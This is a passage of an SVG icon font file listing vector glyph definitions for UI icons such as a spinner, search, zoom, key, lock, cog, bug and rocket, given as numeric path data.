52.682-61.37-0.066-0.296-0.13-0.584-0.198-0.884-0.644-3.248-1.632-6.542-2.556-9.942-0.934-3.388-1.894-6.876-2.88-10.454-0.516-1.78-0.934-3.602-1.546-5.406-0.596-1.802-1.202-3.628-1.81-5.476-1.218-3.682-2.464-7.45-3.736-11.294-0.316-0.958-0.634-1.924-0.956-2.892-0.37-0.954-0.74-1.914-1.114-2.876-0.746-1.924-1.5-3.868-2.26-5.83-1.52-3.904-3.070-7.882-4.646-11.93-1.768-3.96-3.566-7.99-5.392-12.080-0.908-2.038-1.824-4.090-2.746-6.156-0.932-2.060-2.036-4.072-3.052-6.126-2.070-4.084-4.17-8.222-6.294-12.412-2.202-4.142-4.654-8.224-6.998-12.392-1.184-2.074-2.374-4.16-3.57-6.256-1.21-2.086-2.586-4.102-3.876-6.166-2.616-4.098-5.256-8.232-7.918-12.402-11.234-16.298-23.632-32.398-37.33-47.638-13.874-15.104-28.842-29.404-44.598-42.548-15.974-12.928-32.686-24.65-49.676-35.022-17.13-10.194-34.6-18.838-51.734-26.258-4.35-1.7-8.662-3.382-12.934-5.050-2.136-0.812-4.216-1.71-6.36-2.444-2.146-0.714-4.28-1.428-6.404-2.136-4.25-1.386-8.382-2.888-12.548-4.142-4.184-1.174-8.314-2.332-12.392-3.474-2.038-0.55-4.026-1.19-6.054-1.662-2.030-0.458-4.044-0.914-6.044-1.368-3.978-0.91-7.896-1.806-11.748-2.688-3.888-0.686-7.71-1.36-11.462-2.022-1.868-0.33-3.716-0.658-5.546-0.98-0.914-0.162-1.824-0.324-2.728-0.484-0.916-0.112-1.828-0.222-2.734-0.332-3.612-0.448-7.148-0.882-10.604-1.31-1.72-0.216-3.422-0.432-5.102-0.644-1.674-0.226-3.364-0.266-5.010-0.408-3.292-0.238-6.498-0.472-9.616-0.7-3.11-0.218-6.11-0.524-9.058-0.508-5.848-0.132-11.32-0.256-16.38-0.372-4.664 0.168-8.948 0.324-12.818 0.462-1.914 0.054-3.726 0.108-5.432 0.156-2.122 0.134-4.108 0.26-5.958 0.378-2.13 0.138-4.060 0.266-5.82 0.38-3.256 0.51-6.592 0.782-9.99 0.782-0.466 0-0.93-0.026-1.396-0.036-0.132 0.008-0.224 0.014-0.224 0.014v-0.020c-31.004-0.774-56.524-23.586-61.488-53.364-3.2 0.64-6.446 1.61-9.792 2.522-3.386 0.934-6.876 1.894-10.454 2.878-1.778 0.516-3.602 0.938-5.404 1.546-1.802 0.598-3.63 1.204-5.478 1.812-3.68 1.218-7.448 2.464-11.292 3.738-0.96 0.316-1.924 0.632-2.892 0.954-0.956 0.372-1.914 0.742-2.876 1.114-1.926 0.746-3.868 1.5-5.83 2.258-3.904 1.524-7.884 3.070-11.932 4.648-3.96 1.77-7.988 3.566-12.080 5.39-2.038 0.91-4.088 1.824-6.156 2.746-2.060 0.934-4.072 2.036-6.126 3.054-4.082 2.070-8.222 4.172-12.41 6.296-4.144 2.2-8.226 4.652-12.394 6.996-2.074 1.184-4.16 2.376-6.256 3.57-2.086 1.21-4.102 2.586-6.166 3.878-4.098 2.614-8.23 5.254-12.402 7.918-16.296 11.23-32.398 23.632-47.636 37.328-15.104 13.876-29.406 28.84-42.55 44.598-12.928 15.972-24.648 32.684-35.020 49.676-10.196 17.128-18.84 34.602-26.26 51.734-1.698 4.352-3.382 8.664-5.050 12.934-0.812 2.136-1.71 4.218-2.444 6.36-0.714 2.148-1.428 4.282-2.136 6.406-1.386 4.25-2.888 8.382-4.142 12.546-1.174 4.184-2.33 8.316-3.474 12.394-0.55 2.036-1.19 4.024-1.66 6.054-0.46 2.028-0.916 4.042-1.368 6.042-0.91 3.98-1.808 7.898-2.688 11.75-0.688 3.886-1.362 7.71-2.024 11.46-0.33 1.868-0.656 3.718-0.98 5.546-0.162 0.914-0.324 1.824-0.484 2.73-0.11 0.914-0.222 1.828-0.332 2.734-0.446 3.61-0.882 7.148-1.31 10.602-0.216 1.722-0.432 3.422-0.642 5.102-0.226 1.676-0.268 3.364-0.41 5.012-0.238 3.29-0.472 6.496-0.7 9.614-0.218 3.11-0.524 6.11-0.508 9.058-0.132 5.848-0.256 11.32-0.372 16.382 0.168 4.664 0.324 8.946 0.462 12.816 0.054 1.914 0.108 3.726 0.156 5.434 0.134 2.122 0.26 4.106 0.378 5.958 0.138 2.128 0.266 4.058 0.38 5.82 0.496 3.26 0.766 6.596 0.766 9.994 0 0.466-0.026 0.93-0.036 1.396 0.008 0.132 0.016 0.224 0.016 0.224h-0.022c-0.78 31.38-24.134 57.154-54.44 61.674z" />
<glyph unicode="&#xedd0;" glyph-name="spinner11" d="M1024 576h-384l143.53 143.53c-72.53 72.526-168.96 112.47-271.53 112.47s-199-39.944-271.53-112.47c-72.526-72.53-112.47-168.96-112.47-271.53s39.944-199 112.47-271.53c72.53-72.526 168.96-112.47 271.53-112.47s199 39.944 271.528 112.472c6.056 6.054 11.86 12.292 17.456 18.668l96.32-84.282c-93.846-107.166-231.664-174.858-385.304-174.858-282.77 0-512 229.23-512 512s229.23 512 512 512c141.386 0 269.368-57.326 362.016-149.984l149.984 149.984v-384z" />
<glyph unicode="&#xedd1;" glyph-name="binoculars" d="M64 960h384v-64h-384zM576 960h384v-64h-384zM952 640h-56v256h-256v-256h-256v256h-256v-256h-56c-39.6 0-72-32.4-72-72v-560c0-39.6 32.4-72 72-72h304c39.6 0 72 32.4 72 72v376h128v-376c0-39.6 32.4-72 72-72h304c39.6 0 72 32.4 72 72v560c0 39.6-32.4 72-72 72zM348 0h-248c-19.8 0-36 14.4-36 32s16.2 32 36 32h248c19.8 0 36-14.4 36-32s-16.2-32-36-32zM544 448h-64c-17.6 0-32 14.4-32 32s14.4 32 32 32h64c17.6 0 32-14.4 32-32s-14.4-32-32-32zM924 0h-248c-19.8 0-36 14.4-36 32s16.2 32 36 32h248c19.8 0 36-14.4 36-32s-16.2-32-36-32z" />
<glyph unicode="&#xedd2;" glyph-name="search" d="M992.262 88.604l-242.552 206.294c-25.074 22.566-51.89 32.926-73.552 31.926 57.256 67.068 91.842 154.078 91.842 249.176 0 212.078-171.922 384-384 384-212.076 0-384-171.922-384-384s171.922-384 384-384c95.098 0 182.108 34.586 249.176 91.844-1-21.662 9.36-48.478 31.926-73.552l206.294-242.552c35.322-39.246 93.022-42.554 128.22-7.356s31.892 92.898-7.354 128.22zM384 320c-141.384 0-256 114.616-256 256s114.616 256 256 256 256-114.616 256-256-114.614-256-256-256z" />
<glyph unicode="&#xedd3;" glyph-name="zoom-in" d="M992.262 88.604l-242.552 206.294c-25.074 22.566-51.89 32.926-73.552 31.926 57.256 67.068 91.842 154.078 91.842 249.176 0 212.078-171.922 384-384 384-212.076 0-384-171.922-384-384s171.922-384 384-384c95.098 0 182.108 34.586 249.176 91.844-1-21.662 9.36-48.478 31.926-73.552l206.294-242.552c35.322-39.246 93.022-42.554 128.22-7.356s31.892 92.898-7.354 128.22zM384 320c-141.384 0-256 114.616-256 256s114.616 256 256 256 256-114.616 256-256-114.614-256-256-256zM448 768h-128v-128h-128v-128h128v-128h128v128h128v128h-128z" />
<glyph unicode="&#xedd4;" glyph-name="zoom-out" d="M992.262 88.604l-242.552 206.294c-25.074 22.566-51.89 32.926-73.552 31.926 57.256 67.068 91.842 154.078 91.842 249.176 0 212.078-171.922 384-384 384-212.076 0-384-171.922-384-384s171.922-384 384-384c95.098 0 182.108 34.586 249.176 91.844-1-21.662 9.36-48.478 31.926-73.552l206.294-242.552c35.322-39.246 93.022-42.554 128.22-7.356s31.892 92.898-7.354 128.22zM384 320c-141.384 0-256 114.616-256 256s114.616 256 256 256 256-114.616 256-256-114.614-256-256-256zM192 640h384v-128h-384z" />
<glyph unicode="&#xedd5;" glyph-name="enlarge" d="M1024 960h-416l160-160-192-192 96-96 192 192 160-160zM1024-64v416l-160-160-192 192-96-96 192-192-160-160zM0-64h416l-160 160 192 192-96 96-192-192-160 160zM0 960v-416l160 160 192-192 96 96-192 192 160 160z" />
<glyph unicode="&#xedd6;" glyph-name="shrink" d="M576 512h416l-160 160 192 192-96 96-192-192-160 160zM576 384v-416l160 160 192-192 96 96-192 192 160 160zM448 384.004h-416l160-160-192-192 96-96 192 192 160-160zM448 512v416l-160-160-192 192-96-96 192-192-160-160z" />
<glyph unicode="&#xedd7;" glyph-name="enlarge2" d="M1024 960v-416l-160 160-192-192-96 96 192 192-160 160zM448 288l-192-192 160-160h-416v416l160-160 192 192z" />
<glyph unicode="&#xedd8;" glyph-name="shrink2" d="M448 384v-416l-160 160-192-192-96 96 192 192-160 160zM1024 864l-192-192 160-160h-416v416l160-160 192 192z" />
<glyph unicode="&#xedd9;" glyph-name="key" d="M704 960c-176.73 0-320-143.268-320-320 0-20.026 1.858-39.616 5.376-58.624l-389.376-389.376v-192c0-35.346 28.654-64 64-64h64v64h128v128h128v128h128l83.042 83.042c34.010-12.316 70.696-19.042 108.958-19.042 176.73 0 320 143.268 320 320s-143.27 320-320 320zM799.874 639.874c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96z" />
<glyph unicode="&#xedda;" glyph-name="key2" d="M1002.132 645.758l-101.106 101.104c-24.792 24.794-65.37 65.368-90.162 90.164l-101.106 101.104c-24.792 24.794-68.954 29.166-98.13 9.716l-276.438-184.292c-29.176-19.452-40.218-61.028-24.536-92.39l70.486-140.974c2.154-4.306 4.646-8.896 7.39-13.66l-356.53-356.53-32-224h192v64h128v128h128v128h128v71.186c6.396-3.812 12.534-7.216 18.192-10.044l140.97-70.488c31.366-15.682 72.94-4.638 92.39 24.538l184.294 276.44c19.454 29.172 15.078 73.33-9.714 98.126zM150.628 105.374l-45.254 45.254 311.572 311.57 45.254-45.254-311.572-311.57zM917.020 536.236l-45.256-45.256c-12.446-12.444-32.808-12.444-45.254 0l-271.53 271.53c-12.446 12.444-12.446 32.81 0 45.254l45.256 45.256c12.446 12.444 32.808 12.444 45.254 0l271.53-271.53c12.446-12.444 12.446-32.81 0-45.254z" />
<glyph unicode="&#xeddb;" glyph-name="lock" d="M592 512h-16v192c0 105.87-86.13 192-192 192h-128c-105.87 0-192-86.13-192-192v-192h-16c-26.4 0-48-21.6-48-48v-480c0-26.4 21.6-48 48-48h544c26.4 0 48 21.6 48 48v480c0 26.4-21.6 48-48 48zM192 704c0 35.29 28.71 64 64 64h128c35.29 0 64-28.71 64-64v-192h-256v192z" />
<glyph unicode="&#xeddc;" glyph-name="unlocked" d="M768 896c105.87 0 192-86.13 192-192v-192h-128v192c0 35.29-28.71 64-64 64h-128c-35.29 0-64-28.71-64-64v-192h16c26.4 0 48-21.6 48-48v-480c0-26.4-21.6-48-48-48h-544c-26.4 0-48 21.6-48 48v480c0 26.4 21.6 48 48 48h400v192c0 105.87 86.13 192 192 192h128z" />
<glyph unicode="&#xeddd;" glyph-name="wrench" d="M1002.934 142.124l-460.552 394.76c21.448 40.298 33.618 86.282 33.618 135.116 0 159.058-128.942 288-288 288-29.094 0-57.172-4.332-83.646-12.354l166.39-166.39c24.89-24.89 24.89-65.62 0-90.51l-101.49-101.49c-24.89-24.89-65.62-24.89-90.51 0l-166.39 166.39c-8.022-26.474-12.354-54.552-12.354-83.646 0-159.058 128.942-288 288-288 48.834 0 94.818 12.17 135.116 33.62l394.76-460.552c22.908-26.724 62.016-28.226 86.904-3.338l101.492 101.492c24.888 24.888 23.386 63.994-3.338 86.902z" />
<glyph unicode="&#xedde;" glyph-name="equalizer" d="M448 832v16c0 26.4-21.6 48-48 48h-160c-26.4 0-48-21.6-48-48v-16h-192v-128h192v-16c0-26.4 21.6-48 48-48h160c26.4 0 48 21.6 48 48v16h576v128h-576zM256 704v128h128v-128h-128zM832 528c0 26.4-21.6 48-48 48h-160c-26.4 0-48-21.6-48-48v-16h-576v-128h576v-16c0-26.4 21.6-48 48-48h160c26.4 0 48 21.6 48 48v16h192v128h-192v16zM640 384v128h128v-128h-128zM448 208c0 26.4-21.6 48-48 48h-160c-26.4 0-48-21.6-48-48v-16h-192v-128h192v-16c0-26.4 21.6-48 48-48h160c26.4 0 48 21.6 48 48v16h576v128h-576v16zM256 64v128h128v-128h-128z" />
<glyph unicode="&#xeddf;" glyph-name="equalizer2" d="M896 512h16c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48h-16v192h-128v-192h-16c-26.4 0-48-21.6-48-48v-160c0-26.4 21.6-48 48-48h16v-576h128v576zM768 704h128v-128h-128v128zM592 128c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48h-16v576h-128v-576h-16c-26.4 0-48-21.6-48-48v-160c0-26.4 21.6-48 48-48h16v-192h128v192h16zM448 320h128v-128h-128v128zM272 512c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48h-16v192h-128v-192h-16c-26.4 0-48-21.6-48-48v-160c0-26.4 21.6-48 48-48h16v-576h128v576h16zM128 704h128v-128h-128v128z" />
<glyph unicode="&#xede0;" glyph-name="cog" d="M933.79 349.75c-53.726 93.054-21.416 212.304 72.152 266.488l-100.626 174.292c-28.75-16.854-62.176-26.518-97.846-26.518-107.536 0-194.708 87.746-194.708 195.99h-201.258c0.266-33.41-8.074-67.282-25.958-98.252-53.724-93.056-173.156-124.702-266.862-70.758l-100.624-174.292c28.97-16.472 54.050-40.588 71.886-71.478 53.638-92.908 21.512-211.92-71.708-266.224l100.626-174.292c28.65 16.696 61.916 26.254 97.4 26.254 107.196 0 194.144-87.192 194.7-194.958h201.254c-0.086 33.074 8.272 66.57 25.966 97.218 53.636 92.906 172.776 124.594 266.414 71.012l100.626 174.29c-28.78 16.466-53.692 40.498-71.434 71.228zM512 240.668c-114.508 0-207.336 92.824-207.336 207.334 0 114.508 92.826 207.334 207.336 207.334 114.508 0 207.332-92.826 207.332-207.334-0.002-114.51-92.824-207.334-207.332-207.334z" />
<glyph unicode="&#xede1;" glyph-name="cogs" d="M363.722 237.948l41.298 57.816-45.254 45.256-57.818-41.296c-10.722 5.994-22.204 10.774-34.266 14.192l-11.682 70.084h-64l-11.68-70.086c-12.062-3.418-23.544-8.198-34.266-14.192l-57.818 41.298-45.256-45.256 41.298-57.816c-5.994-10.72-10.774-22.206-14.192-34.266l-70.086-11.682v-64l70.086-11.682c3.418-12.060 8.198-23.544 14.192-34.266l-41.298-57.816 45.254-45.256 57.818 41.296c10.722-5.994 22.204-10.774 34.266-14.192l11.682-70.084h64l11.68 70.086c12.062 3.418 23.544 8.198 34.266 14.192l57.818-41.296 45.254 45.256-41.298 57.816c5.994 10.72 10.774 22.206 14.192 34.266l70.088 11.68v64l-70.086 11.682c-3.418 12.060-8.198 23.544-14.192 34.266zM224 96c-35.348 0-64 28.654-64 64s28.652 64 64 64 64-28.654 64-64-28.652-64-64-64zM1024 576v64l-67.382 12.25c-1.242 8.046-2.832 15.978-4.724 23.79l57.558 37.1-24.492 59.128-66.944-14.468c-4.214 6.91-8.726 13.62-13.492 20.13l39.006 56.342-45.256 45.254-56.342-39.006c-6.512 4.766-13.22 9.276-20.13 13.494l14.468 66.944-59.128 24.494-37.1-57.558c-7.812 1.892-15.744 3.482-23.79 4.724l-12.252 67.382h-64l-12.252-67.382c-8.046-1.242-15.976-2.832-23.79-4.724l-37.098 57.558-59.128-24.492 14.468-66.944c-6.91-4.216-13.62-8.728-20.13-13.494l-56.342 39.006-45.254-45.254 39.006-56.342c-4.766-6.51-9.278-13.22-13.494-20.13l-66.944 14.468-24.492-59.128 57.558-37.1c-1.892-7.812-3.482-15.742-4.724-23.79l-67.384-12.252v-64l67.382-12.25c1.242-8.046 2.832-15.978 4.724-23.79l-57.558-37.1 24.492-59.128 66.944 14.468c4.216-6.91 8.728-13.618 13.494-20.13l-39.006-56.342 45.254-45.256 56.342 39.006c6.51-4.766 13.22-9.276 20.13-13.492l-14.468-66.944 59.128-24.492 37.102 57.558c7.81-1.892 15.742-3.482 23.788-4.724l12.252-67.384h64l12.252 67.382c8.044 1.242 15.976 2.832 23.79 4.724l37.1-57.558 59.128 24.492-14.468 66.944c6.91 4.216 13.62 8.726 20.13 13.492l56.342-39.006 45.256 45.256-39.006 56.342c4.766 6.512 9.276 13.22 13.492 20.13l66.944-14.468 24.492 59.13-57.558 37.1c1.892 7.812 3.482 15.742 4.724 23.79l67.382 12.25zM672 468.8c-76.878 0-139.2 62.322-139.2 139.2s62.32 139.2 139.2 139.2 139.2-62.322 139.2-139.2c0-76.878-62.32-139.2-139.2-139.2z" />
<glyph unicode="&#xede2;" glyph-name="hammer" d="M1009.996 131.024l-301.544 301.544c-18.668 18.668-49.214 18.668-67.882 0l-22.626-22.626-184 184 302.056 302.058h-320l-142.058-142.058-14.060 14.058h-67.882v-67.882l14.058-14.058-206.058-206.060 160-160 206.058 206.058 184-184-22.626-22.626c-18.668-18.668-18.668-49.214 0-67.882l301.544-301.544c18.668-18.668 49.214-18.668 67.882 0l113.136 113.136c18.67 18.666 18.67 49.214 0.002 67.882z" />
<glyph unicode="&#xede3;" glyph-name="magic-wand" d="M256 768l-128 128h-64v-64l128-128zM320 960h64v-128h-64zM576 640h128v-64h-128zM640 832v64h-64l-128-128 64-64zM0 640h128v-64h-128zM320 384h64v-128h-64zM64 384v-64h64l128 128-64 64zM1010 78l-636.118 636.118c-18.668 18.668-49.214 18.668-67.882 0l-60.118-60.118c-18.668-18.668-18.668-49.214 0-67.882l636.118-636.118c18.668-18.668 49.214-18.668 67.882 0l60.118 60.118c18.668 18.668 18.668 49.214 0 67.882zM480 416l-192 192 64 64 192-192-64-64z" />
<glyph unicode="&#xede4;" glyph-name="aid-kit" d="M896 704h-192v128c0 35.2-28.8 64-64 64h-256c-35.2 0-64-28.8-64-64v-128h-192c-70.4 0-128-57.6-128-128v-512c0-70.4 57.6-128 128-128h768c70.4 0 128 57.6 128 128v512c0 70.4-57.6 128-128 128zM384 832h256v-128h-256v128zM768 256h-192v-192h-128v192h-192v128h192v192h128v-192h192v-128z" />
<glyph unicode="&#xede5;" glyph-name="bug" d="M1024 384v64h-193.29c-5.862 72.686-31.786 139.026-71.67 192.25h161.944l70.060 280.24-62.090 15.522-57.94-231.76h-174.68c-0.892 0.694-1.796 1.374-2.698 2.056 6.71 19.502 10.362 40.422 10.362 62.194 0.002 105.76-85.958 191.498-191.998 191.498s-192-85.738-192-191.5c0-21.772 3.65-42.692 10.362-62.194-0.9-0.684-1.804-1.362-2.698-2.056h-174.68l-57.94 231.76-62.090-15.522 70.060-280.24h161.944c-39.884-53.222-65.806-119.562-71.668-192.248h-193.29v-64h193.37c3.802-45.664 15.508-88.812 33.638-127.75h-123.992l-70.060-280.238 62.090-15.524 57.94 231.762h112.354c58.692-78.032 147.396-127.75 246.66-127.75s187.966 49.718 246.662 127.75h112.354l57.94-231.762 62.090 15.524-70.060 280.238h-123.992c18.13 38.938 29.836 82.086 33.636 127.75h193.37z" />
<glyph unicode="&#xede6;" glyph-name="pie-chart" d="M448 384v448c-247.424 0-448-200.576-448-448s200.576-448 448-448 448 200.576 448 448c0 72.034-17.028 140.084-47.236 200.382l-400.764-200.382zM912.764 712.382c-73.552 146.816-225.374 247.618-400.764 247.618v-448l400.764 200.382z" />
<glyph unicode="&#xede7;" glyph-name="stats-dots" d="M128 64h896v-128h-1024v1024h128zM288 128c-53.020 0-96 42.98-96 96s42.98 96 96 96c2.828 0 5.622-0.148 8.388-0.386l103.192 171.986c-9.84 15.070-15.58 33.062-15.58 52.402 0 53.020 42.98 96 96 96s96-42.98 96-96c0-19.342-5.74-37.332-15.58-52.402l103.192-171.986c2.766 0.238 5.56 0.386 8.388 0.386 2.136 0 4.248-0.094 6.35-0.23l170.356 298.122c-10.536 15.408-16.706 34.036-16.706 54.11 0 53.020 42.98 96 96 96s96-42.98 96-96c0-53.020-42.98-96-96-96-2.14 0-4.248 0.094-6.35 0.232l-170.356-298.124c10.536-15.406 16.706-34.036 16.706-54.11 0-53.020-42.98-96-96-96s-96 42.98-96 96c0 19.34 5.74 37.332 15.578 52.402l-103.19 171.984c-2.766-0.238-5.56-0.386-8.388-0.386s-5.622 0.146-8.388 0.386l-103.192-171.986c9.84-15.068 15.58-33.060 15.58-52.4 0-53.020-42.98-96-96-96z" />
<glyph unicode="&#xede8;" glyph-name="stats-bars" d="M0 128h1024v-128h-1024zM128 384h128v-192h-128zM320 640h128v-448h-128zM512 448h128v-256h-128zM704 832h128v-640h-128z" />
<glyph unicode="&#xede9;" glyph-name="stats-bars2" d="M288 576h-192c-17.6 0-32-14.4-32-32v-576c0-17.6 14.4-32 32-32h192c17.6 0 32 14.4 32 32v576c0 17.6-14.4 32-32 32zM288 0h-192v256h192v-256zM608 704h-192c-17.6 0-32-14.4-32-32v-704c0-17.6 14.4-32 32-32h192c17.6 0 32 14.4 32 32v704c0 17.6-14.4 32-32 32zM608 0h-192v320h192v-320zM928 832h-192c-17.6 0-32-14.4-32-32v-832c0-17.6 14.4-32 32-32h192c17.6 0 32 14.4 32 32v832c0 17.6-14.4 32-32 32zM928 0h-192v384h192v-384z" />
<glyph unicode="&#xedea;" glyph-name="trophy" d="M832 768v128h-640v-128h-192v-128c0-106.038 85.958-192 192-192 20.076 0 39.43 3.086 57.62 8.802 46.174-66.008 116.608-113.796 198.38-130.396v-198.406h-64c-70.694 0-128-57.306-128-128h512c0 70.694-57.306 128-128 128h-64v198.406c81.772 16.6 152.206 64.386 198.38 130.396 18.19-5.716 37.544-8.802 57.62-8.802 106.042 0 192 85.962 192 192v128h-192zM192 524c-63.962 0-116 52.038-116 116v64h116v-64c0-40.186 7.43-78.632 20.954-114.068-6.802-1.246-13.798-1.932-20.954-1.932zM948 640c0-63.962-52.038-116-116-116-7.156 0-14.152 0.686-20.954 1.932 13.524 35.436 20.954 73.882 20.954 114.068v64h116v-64z" />
<glyph unicode="&#xedeb;" glyph-name="gift" d="M771.516 640c18.126 12.88 35.512 27.216 51.444 43.148 33.402 33.402 55.746 74.5 62.912 115.722 7.858 45.186-3.672 87.14-31.63 115.1-22.3 22.298-52.51 34.086-87.364 34.086-49.632 0-101.922-23.824-143.46-65.362-66.476-66.476-105.226-158.238-126.076-223.722-15.44 65.802-46.206 154.644-106.018 214.458-32.094 32.092-73.114 48.57-111.846 48.57-31.654 0-61.78-11.004-84.26-33.486-49.986-49.988-43.232-137.786 15.086-196.104 20.792-20.792 45.098-38.062 70.72-52.412h-217.024v-256h64v-448h768v448.002h64v256h-188.484zM674.326 831.782c27.724 27.724 62.322 44.274 92.55 44.274 10.7 0 25.708-2.254 36.45-12.998 26.030-26.028 11.412-86.308-31.28-128.998-43.946-43.946-103.060-74.168-154.432-94.060h-50.672c18.568 57.548 52.058 136.456 107.384 191.782zM233.934 799.11c-0.702 9.12-0.050 26.248 12.196 38.494 10.244 10.244 23.788 12.396 33.348 12.396v0c21.258 0 43.468-10.016 60.932-27.48 33.872-33.872 61.766-87.772 80.668-155.876 0.51-1.84 1.008-3.67 1.496-5.486-1.816 0.486-3.646 0.984-5.486 1.496-68.104 18.904-122.002 46.798-155.874 80.67-15.828 15.826-25.77 36.16-27.28 55.786zM448 0h-256v416h256v-416zM448 448h-320v128h320v-128zM832 0h-256v416h256v-416zM896 448h-320v128h320v-128z" />
<glyph unicode="&#xedec;" glyph-name="glass" d="M777.784 943.144c-5.576 10.38-16.406 16.856-28.19 16.856h-475.188c-11.784 0-22.614-6.476-28.19-16.856-35.468-66.020-54.216-143.184-54.216-223.144 0-105.412 32.372-204.828 91.154-279.938 45.428-58.046 102.48-96.54 164.846-112.172v-327.89h-96c-17.672 0-32-14.326-32-32s14.328-32 32-32h320c17.674 0 32 14.326 32 32s-14.326 32-32 32h-96v327.89c62.368 15.632 119.418 54.124 164.846 112.172 58.782 75.11 91.154 174.526 91.154 279.938 0 79.96-18.748 157.122-54.216 223.144zM294.1 896h435.8c24.974-52.902 38.1-113.338 38.1-176 0-5.364-0.108-10.696-0.296-16h-511.406c-0.19 5.304-0.296 10.636-0.296 16-0.002 62.664 13.126 123.098 38.098 176z" />
<glyph unicode="&#xeded;" glyph-name="glass2" d="M889.162 780.23c7.568 9.632 8.972 22.742 3.62 33.758-5.356 11.018-16.532 18.012-28.782 18.012h-704c-12.25 0-23.426-6.994-28.78-18.012-5.356-11.018-3.95-24.126 3.618-33.758l313.162-398.57v-381.66h-96c-17.672 0-32-14.326-32-32s14.328-32 32-32h320c17.674 0 32 14.326 32 32s-14.326 32-32 32h-96v381.66l313.162 398.57zM798.162 768l-100.572-128h-371.18l-100.57 128h572.322z" />
<glyph unicode="&#xedee;" glyph-name="mug" d="M960 640h-192v96c0 88.366-171.922 160-384 160s-384-71.634-384-160v-640c0-88.366 171.922-160 384-160s384 71.634 384 160v96h192c35.346 0 64 28.654 64 64v320c0 35.346-28.654 64-64 64zM176.056 701.602c-36.994 12.19-59.408 25.246-71.41 34.398 12.004 9.152 34.416 22.208 71.41 34.398 57.942 19.090 131.79 29.602 207.944 29.602s150.004-10.512 207.944-29.602c36.994-12.188 59.408-25.246 71.41-34.398-12.002-9.152-34.416-22.208-71.41-34.398-57.94-19.090-131.79-29.602-207.944-29.602s-150.002 10.512-207.944 29.602zM896 320h-128v192h128v-192z" />
<glyph unicode="&#xedef;" glyph-name="spoon-knife" d="M224 960c-106.040 0-192-100.288-192-224 0-105.924 63.022-194.666 147.706-217.998l-31.788-518.124c-2.154-35.132 24.882-63.878 60.082-63.878h32c35.2 0 62.236 28.746 60.082 63.878l-31.788 518.124c84.684 23.332 147.706 112.074 147.706 217.998 0 123.712-85.96 224-192 224zM869.334 960l-53.334-320h-40l-26.666 320h-26.668l-26.666-320h-40l-53.334 320h-26.666v-416c0-17.672 14.326-32 32-32h83.338l-31.42-512.122c-2.154-35.132 24.882-63.878 60.082-63.878h32c35.2 0 62.236 28.746 60.082 63.878l-31.42 512.122h83.338c17.674 0 32 14.328 32 32v416h-26.666z" />
<glyph unicode="&#xedf0;" glyph-name="leaf" d="M1011.328 825.504c-110.752 83.928-281.184 134.034-455.91 134.034-216.12 0-392.226-75.456-483.16-207.020-42.708-61.79-66.33-134.958-70.208-217.474-3.454-73.474 8.884-154.726 36.684-242.146 94.874 284.384 359.82 507.102 665.266 507.102 0 0-285.826-75.232-465.524-308.192-0.112-0.138-2.494-3.090-6.614-8.698-36.080-48.278-67.538-103.162-91.078-165.328-39.87-94.83-76.784-224.948-76.784-381.782h128c0 0-19.43 122.222 14.36 262.79 55.89-7.556 105.858-11.306 150.852-11.306 117.678 0 201.37 25.46 263.388 80.124 55.568 48.978 86.198 114.786 118.624 184.456 49.524 106.408 105.654 227.010 268.654 320.152 9.33 5.332 15.362 14.992 16.056 25.716s-4.040 21.080-12.606 27.572z" />
<glyph unicode="&#xedf1;" glyph-name="rocket" d="M704 896l-320-320h-192l-192-256c0 0 203.416 56.652 322.066 30.084l-322.066-414.084 421.902 328.144c58.838-134.654-37.902-328.144-37.902-328.144l256 192v192l320 320 64 320-320-64z" />
<glyph unicode="&#xedf2;" glyph-name="meter" d="M512 896c282.77 0 512-229.23 512-512 0-192.792-106.576-360.666-264.008-448h-495.984c-157.432 87.334-264.008 255.208-264.008 448 0 282.77 229.23 512 512 512zM801.914 94.086c77.438 77.44 120.086 180.398 120.086 289.914h-90v64h85.038c-7.014 44.998-21.39 88.146-42.564 128h-106.474v64h64.284c-9.438 11.762-19.552 23.096-30.37 33.914-46.222 46.22-101.54 80.038-161.914 99.798v-69.712h-64v85.040c-20.982 3.268-42.36 4.96-64 4.96s-43.018-1.69-64-4.96v-85.040h-64v69.712c-60.372-19.76-115.692-53.576-161.914-99.798-10.818-10.818-20.932-22.152-30.37-33.914h64.284v-64h-106.476c-21.174-39.854-35.552-83.002-42.564-128h85.040v-64h-90c0-109.516 42.648-212.474 120.086-289.914 10.71-10.71 21.924-20.728 33.56-30.086h192.354l36.572 512h54.856l36.572-512h192.354c11.636 9.358 22.852 19.378 33.56 30.086z" />
<glyph unicode="&#xedf3;" glyph-name="meter2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM302.836 125.848c11.106 30.632 17.164 63.688 17.164 98.152 0 124.35-78.81 230.292-189.208 270.606 10.21 84.924 48.254 163.498 109.678 224.924 72.53 72.526 168.96 112.47 271.53 112.47s199-39.944 271.53-112.47c61.428-61.426 99.468-140 109.682-224.924-110.402-40.314-189.212-146.256-189.212-270.606 0-34.468 6.060-67.52 17.166-98.15-61.706-40.242-133.77-61.85-209.166-61.85-75.394 0-147.458 21.608-209.164 61.848zM551.754 319.004c13.878-3.494 24.246-16.080 24.246-31.004v-64c0-17.6-14.4-32-32-32h-64c-17.6 0-32 14.4-32 32v64c0 14.924 10.368 27.51 24.246 31.004l23.754 448.996h32l23.754-448.996z" />
<glyph unicode="&#xedf4;" glyph-name="hammer2" d="M1010.174 44.25l-548.634 499.458 25.534 25.598c20.894 20.954 32.188 48.030 33.918 75.61 1.002 0.45 2.002 0.912 2.958 1.442l102.99 64.402c13.934 16.392 12.916 42.268-2.284 57.502l-179.12 179.608c-15.19 15.234-40.998 16.262-57.344 2.284l-64.236-103.268c-0.526-0.966-0.99-1.966-1.44-2.974-27.502-1.736-54.5-13.056-75.398-34.006l-97.428-97.702c-20.898-20.956-32.184-48.026-33.918-75.604-1.004-0.45-2.004-0.916-2.964-1.446l-102.986-64.406c-13.942-16.39-12.916-42.264 2.276-57.496l179.12-179.604c15.194-15.238 40.996-16.262 57.35-2.286l64.228 103.27c0.528 0.958 0.988 1.96 1.442 2.966 27.502 1.738 54.504 13.050 75.398 34.004l28.292 28.372 498.122-550.114c14.436-15.944 36.7-18.518 49.474-5.712l50.356 50.488c12.764 12.808 10.196 35.132-5.706 49.614z" />
